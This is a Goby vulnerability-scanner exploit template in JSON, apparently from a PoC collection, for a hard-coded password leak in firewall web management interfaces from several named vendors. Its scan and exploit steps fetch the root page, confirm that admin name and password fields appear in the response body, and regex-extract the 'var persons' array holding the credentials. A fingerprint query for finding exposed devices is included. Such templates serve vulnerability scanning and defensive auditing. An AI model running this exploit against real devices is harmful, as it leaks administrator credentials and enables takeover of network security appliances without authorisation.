Goby/json/Security_Devices_Hardcoded_...

99 lines
3.5 KiB
JSON

{
"Name": "Security Devices Hardcoded Password",
"Level": "2",
"Tags": [
"infoleak"
],
"GobyQuery": "body=\"var dkey_verify = Get_Verify_Info(hex_md5)\"",
"Description": "",
"Product": "",
"Homepage": "",
"Author": "",
"Impact": "There are hard-coded vulnerabilities in firewall web management programs such as Zhongke Wangwei, Wangyu Technology, Ruijie, and Tiangong Network.",
"Recommendation": "",
"References": [
"https://mp.weixin.qq.com/s/59-rkZUWZNtJVgIbpULnxw"
],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/",
"follow_redirect": false,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "\"name\":\"admin\",\"password\":\"",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/",
"follow_redirect": false,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "\"name\":\"admin\",\"password\":\"",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|var persons (.*)}];"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}